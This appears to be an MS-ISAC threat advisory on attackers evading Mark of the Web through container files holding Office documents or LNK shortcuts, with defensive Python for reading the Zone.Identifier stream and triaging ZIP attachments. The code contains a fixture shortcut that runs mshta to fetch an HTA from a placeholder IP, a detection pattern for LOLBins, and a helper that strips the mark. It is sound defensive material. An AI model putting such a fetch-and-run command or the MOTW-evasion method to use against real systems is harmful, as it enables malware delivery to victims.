Cyber Threat Actors Evading MOTW for Malware Delivery

The Cyber Threat Intelligence (CTI) team at the Multi-State Information Sharing and Analysis Center (MS-ISAC) has observed an increase in cyber threat actors (CTAs) evading Mark of the Web (MOTW) in their malware delivery campaigns.

The Shifting CTA Ecosystem

In July, Microsoft began blocking VBA macros by default in Office files that come from the internet, because CTAs were abusing macros to gain initial access and deploy malware to their targets. The block relies on the Mark of the Web (MOTW): when a browser or email client saves a downloaded file or an email attachment to an NTFS volume, it writes a Zone.Identifier alternate data stream alongside the file recording the security zone the file came from. An Office application opening the file reads that stream; a ZoneId of 3 (Internet) identifies the document as coming from an untrusted location, so the application blocks the macros outright instead of offering the usual "Enable Content" prompt.


Screenshot of a file downloaded from the internet. "ZoneId=3" in the file's Zone.Identifier stream denotes that it originates from the Internet zone; that stream is the MOTW.
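As an added example (not code from the original advisory), the following Python reads and interprets the Zone.Identifier stream that constitutes the MOTW. The stream name, its INI-style "[ZoneTransfer]" body and the zone numbers are defined by Windows; the sample stream and its URLs are constructed for illustration, and reading or removing the stream only works on an NTFS volume under Windows.

```python
"""Read and interpret a file's Mark of the Web (the Zone.Identifier alternate data stream)."""
import os
import sys

# URL security zones as numbered by Windows (URLZONE_*). Office's macro block and
# SmartScreen act on files whose ZoneId is 3 (Internet) or 4 (Restricted sites).
ZONE_NAMES = {
    0: "Local machine",
    1: "Local intranet",
    2: "Trusted sites",
    3: "Internet",
    4: "Restricted sites",
}
STREAM_SUFFIX = ":Zone.Identifier"

# Constructed sample of what the stream looks like on disk (CRLF, INI style).
# The URLs are placeholders, not indicators.
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://mail.example.invalid/inbox\r\n"
    "HostUrl=https://files.example.invalid/invoice.zip\r\n"
)


def parse_zone_identifier(text):
    """Parse the body of a Zone.Identifier stream into a dict.

    Raises ValueError when there is no ZoneId; a mangled or empty stream
    should be treated as an unmarked file, which is what read_motw() does.
    """
    fields = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("["):
            in_section = line.lower() == "[zonetransfer]"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip()] = value.strip()
    if "ZoneId" not in fields:
        raise ValueError("Zone.Identifier stream has no ZoneId")
    zone_id = int(fields["ZoneId"])
    return {
        "zone_id": zone_id,
        "zone": ZONE_NAMES.get(zone_id, "unknown"),
        "referrer_url": fields.get("ReferrerUrl"),
        "host_url": fields.get("HostUrl"),
        "marked_untrusted": zone_id >= 3,  # the condition Office's macro block fires on
    }


def read_motw(path):
    """Return the parsed MOTW of `path`, or None if it carries no usable Zone.Identifier.

    Windows/NTFS only: the stream is opened as "<file>:Zone.Identifier"; elsewhere the
    open simply fails and the file reports as unmarked.
    """
    try:
        with open(path + STREAM_SUFFIX, "r", encoding="utf-8", errors="replace") as fh:
            return parse_zone_identifier(fh.read())
    except (OSError, ValueError):
        return None


def remove_motw(path):
    """Delete the stream, which is what PowerShell's Unblock-File does (Windows only)."""
    os.remove(path + STREAM_SUFFIX)


if __name__ == "__main__":
    print("sample stream ->", parse_zone_identifier(SAMPLE_STREAM))
    for p in sys.argv[1:]:
        print(p, "->", read_motw(p))
```

Run it with one or more file paths on a Windows host to see which downloads are marked; a document extracted from a mounted ISO will report None, which is exactly the gap the campaigns described below exploit.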

In response, some CTAs have changed how they gain initial access and now favor container files to sidestep the macro block. So far the shift appears limited to a small set of CTAs, but the wider CTA ecosystem will likely adopt it in time.

Recent campaigns using this technique rely on malspam with malicious attachments, often combined with email thread hijacking to increase the chance that the victim opens the attachment. The attachments are typically container files[1], such as IMG, ISO, RAR, or ZIP files, holding malicious Microsoft Office documents, DLLs, Windows shortcut (LNK) files, or Microsoft Windows Installer (MSI) files.

From 2021-2022, the MS-ISAC observed a 173% increase in incident response cases and submissions to its Malicious Code Analysis Platform (MCAP) involving container files. Furthermore, the MS-ISAC witnessed a 280% increase in container files holding LNK files during that same period. Current malware campaigns using these techniques include BazarLoader, Bumblebee, Emotet, IcedID, NjRAT, QakBot, and RedLine Stealer.

Two Methods of MOTW Evasion

Since the beginning of the year, the MS-ISAC has observed CTAs using two main methods to evade MOTW. In the first, CTAs use container files so that the malicious Office document inside never receives the MOTW. In the second, CTAs avoid Office documents entirely and instead place a malicious LNK file in the container.

Method #1: Container File with Office Document

CTAs are using container files that hold malicious Office documents (e.g., Word or Excel) which execute the malware once macros are enabled. These container files reach victims through malspam campaigns or malicious websites. The container file itself carries the MOTW, but the files inside it do not: Windows tags the object that was downloaded, not its contents, and whether the tag propagates depends on how the container is opened. Windows Explorer's built-in ZIP extraction writes a Zone.Identifier stream to each extracted file, whereas mounting an ISO or IMG image, and extracting with many third-party archivers, leaves the inner files unmarked. The contents are also often compressed or password protected, which keeps gateway and endpoint scanners from inspecting them.

When the inner files are extracted or mounted without the MOTW, Windows treats them as local rather than internet-sourced, so Office presents the ordinary macro warning instead of the hard block. The attack still requires the end user to open the document and enable macros, which then triggers execution.

In an MS-ISAC incident response case, an email delivered BazarLoader via an attached password-protected ZIP file containing a malicious Microsoft Word document. Once the document was extracted and opened with macros enabled, it reached out to a malicious domain and downloaded an HTA file, which in turn downloaded a malicious DLL masquerading as a JPG file.

Method #2: Container File with LNK File

Like the first method, the second uses zipped container files to bypass the same controls, but the payload is an LNK file, i.e., a Windows shortcut that opens another file or application. When the end user double-clicks the LNK, it typically launches a native tool such as cmd.exe, PowerShell, or mshta.exe with a command line hardcoded into the shortcut; that command fetches the main payload, such as a DLL or executable, from a URL embedded in it. Once the LNK runs, the launched command can also perform reconnaissance on the victim machine, gathering items such as the MAC address, machine ID, and serial number. (A shortcut file additionally embeds the NetBIOS name, volume serial number, and MAC address of the machine on which it was created, which analysts can use to link samples from the same builder.)

In a separate MS-ISAC incident response case, CTAs delivered the QakBot payload via an email with an attached ZIP file that contained an IMG file of the same name. Double-clicking the IMG file mounted it natively, presenting the victim with three files: a DLL, an LNK, and a Microsoft Word document. The LNK file executed the malicious DLL, while the Word document reached out to a hardcoded IP address once macros were enabled.
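The two cases above share a shape: a ZIP that carries the MOTW wrapping members that do not. As an added example (not code from the original advisory or from MS-ISAC's MCAP), the following Python triages such a container: it lists nested images whose contents will never inherit the mark, and parses each LNK member per the MS-SHLLINK format to recover the command line it launches, the LOLBins and URLs in it, and the creating machine's NetBIOS name and MAC address from the TrackerDataBlock. The sample ZIP, shortcut, machine name, MAC and the 203.0.113.10 address are all constructed fixtures, and the build_lnk helper exists only to create that fixture; the LOLBin list is an illustrative starting point, not a complete one.

```python
"""Triage a ZIP container for LNK lures: recover each shortcut's command line and tracker
metadata, and flag nested images whose contents will not inherit the outer file's MOTW."""
import io
import re
import struct
import uuid
import zipfile

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = uuid.UUID("00021401-0000-0000-c000-000000000046").bytes_le
HAS_LINK_TARGET_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData items appear in this fixed order whenever their LinkFlags bit is set.
STRING_FIELDS = ((0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location"))
TRACKER_DATA_BLOCK = 0xA0000003
LOLBIN_RE = re.compile(r"\b(cmd|powershell|pwsh|mshta|rundll32|regsvr32|wscript|cscript|"
                       r"certutil|bitsadmin|curl)(?:\.exe)?\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
NESTED_CONTAINER_EXT = (".iso", ".img", ".vhd", ".vhdx", ".zip", ".rar", ".7z")


def _read_string(data, off, is_unicode):
    """StringData item: uint16 character count, then the characters (no terminator)."""
    (count,) = struct.unpack_from("<H", data, off)
    off += 2
    if is_unicode:
        return data[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return data[off:off + count].decode("cp1252", "replace"), off + count


def parse_lnk(data):
    """Return the strings and tracker metadata a triage analyst wants from a shell link."""
    if len(data) < LNK_HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link")
    (flags,) = struct.unpack_from("<I", data, 0x14)
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # IDList: uint16 size that excludes itself
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:  # LinkInfo: uint32 size that includes itself
        off += struct.unpack_from("<I", data, off)[0]
    fields = {}
    for bit, name in STRING_FIELDS:
        if flags & bit:
            fields[name], off = _read_string(data, off, bool(flags & IS_UNICODE))
    while off + 8 <= len(data):  # ExtraData: (size, signature, ...) blocks until size < 4
        size, signature = struct.unpack_from("<II", data, off)
        if size < 4:
            break
        if signature == TRACKER_DATA_BLOCK and size >= 0x60:
            # MachineID is the NetBIOS name of the host that created the shortcut; the second
            # GUID of the Droid is a version-1 UUID whose node field is that host's MAC address.
            fields["machine_id"] = data[off + 16:off + 32].split(b"\0", 1)[0].decode("ascii", "replace")
            fields["mac"] = ":".join(f"{b:02x}" for b in data[off + 58:off + 64])
        off += size
    return fields


def triage_zip(zip_bytes):
    """Flag shortcut members (with the LOLBins and URLs they invoke) and nested containers."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if name.lower().endswith(NESTED_CONTAINER_EXT):
                findings.append({"member": name, "reason": "nested container: inner files get no MOTW"})
            if not name.lower().endswith(".lnk"):
                continue
            try:
                lnk = parse_lnk(zf.read(info))
            except ValueError as exc:
                findings.append({"member": name, "reason": str(exc)})
                continue
            command = " ".join(lnk.get(k, "") for k in ("relative_path", "arguments")).strip()
            findings.append({"member": name, "reason": "shortcut with command line", "command": command,
                             "lolbins": sorted({m.group(1).lower() for m in LOLBIN_RE.finditer(command)}),
                             "urls": URL_RE.findall(command),
                             "machine_id": lnk.get("machine_id"), "mac": lnk.get("mac")})
    return findings


def build_lnk(relative_path, arguments, machine_id, mac):
    """Assemble a minimal shell link as a constructed fixture: header, two strings, tracker block."""
    flags = 0x08 | 0x20 | IS_UNICODE  # HasRelativePath | HasArguments | IsUnicode
    header = struct.pack("<I16sIIqqqIiIHHII", LNK_HEADER_SIZE, LNK_CLSID, flags,
                         0x20, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)  # archive attr, zero FILETIMEs, SW_SHOWNORMAL

    def utf16(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    file_guid = uuid.uuid1(node=int.from_bytes(mac, "big"))  # v1 UUID carries the MAC as its node
    droid = uuid.UUID(int=0).bytes_le + file_guid.bytes_le  # volume GUID is irrelevant to triage
    tracker = (struct.pack("<IIII", 0x60, TRACKER_DATA_BLOCK, 0x58, 0)
               + machine_id.encode("ascii").ljust(16, b"\0") + droid + droid)  # Droid, DroidBirth
    return header + utf16(relative_path) + utf16(arguments) + tracker + struct.pack("<I", 0)


def build_sample_zip():
    """Constructed stand-in for a malspam attachment; the address is a TEST-NET-3 placeholder."""
    lnk = build_lnk(r"..\..\..\Windows\System32\cmd.exe", "/c mshta.exe http://203.0.113.10/invoice.hta",
                    "desktop-r9x2k1", bytes.fromhex("0a1b2c3d4e5f"))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Invoice_7731.lnk", lnk)
        zf.writestr("Invoice_7731.img", b"\0" * 64)  # placeholder bytes standing in for a disk image
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(build_sample_zip()):
        print(finding)
```

Point triage_zip at the bytes of a real attachment to get the same report; a shortcut whose command line names cmd, PowerShell, or mshta and carries a URL is the pattern from the QakBot case above, and the recovered machine_id and mac values are the builder's, not the victim's, which is why they are worth keeping as pivot indicators.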

MITRE ATT&CK Patterns Observed

Initial Access
T1566.001 Phishing: Spearphishing Attachment

Execution
T1204.002 User Execution: Malicious File
T1059.001 Command and Scripting Interpreter: PowerShell

Defense Evasion
T1553.005 Subvert Trust Controls: Mark-of-the-Web Bypass
T1218.005 System Binary Proxy Execution: Mshta

How to Defend Against MOTW-Evasive Campaigns

To harden their networks against the techniques discussed above, organizations must put measures in place to defend against suspicious emails. This includes security awareness training on phishing, a suspicious-email reporting policy for all personnel, a banner on all external emails, gateway filters for known malspam indicators (including blocking or quarantining ISO, IMG, VHD, and LNK attachments, which have little legitimate use as email attachments), and DMARC. These controls make it harder for CTAs to get a malicious email into a work inbox.

Organizations also need measures that make it harder for CTAs to deliver their malware if a suspicious email gets through. First, use CIS Critical Security Control 2 (Inventory and Control of Software Assets) to build application allowlists and thereby prevent the installation or execution of unauthorized software. Second, disable macros by policy rather than relying on users declining the prompt, and enable logging, including PowerShell script block logging. Third, reduce the scope for lateral movement and Living off the Land (LotL) techniques by enforcing least privilege, requiring signed PowerShell scripts, and setting PowerShell execution policies, bearing in mind that the execution policy is a safety feature rather than a security boundary and can be overridden from the command line, so it must be paired with allowlisting and logging.

U.S. State, Local, Tribal, and Territorial (SLTT) government organizations can obtain even more assistance in the fight against MOTW evasion by joining the MS-ISAC. Membership unlocks access to cybersecurity tools and resources that they can use to proactively block network traffic from connecting to known malicious web domains, block unauthorized activities at the endpoint, identify and report malicious events, and share indicators of evolving cyber threats.

References

  • https://docs.microsoft.com/en-us/deployoffice/security/internet-macros-blocked
  • https://www.proofpoint.com/us/blog/threat-insight/how-threat-actors-are-adapting-post-macro-world
  • https://threatresearch.ext.hp.com/wp-content/uploads/2022/08/HP-Wolf-Security-Threat-Insights-Report-Q2-2022.pdf
  • https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control
  • https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/
  • https://www.malwarebytes.com/blog/news/2021/10/at-long-last-microsoft-is-disabling-excel-4-0-macros-by-default

[1] Container files are repositories that are created to hold multiple and varying file types for easy storage and delivery within a single file.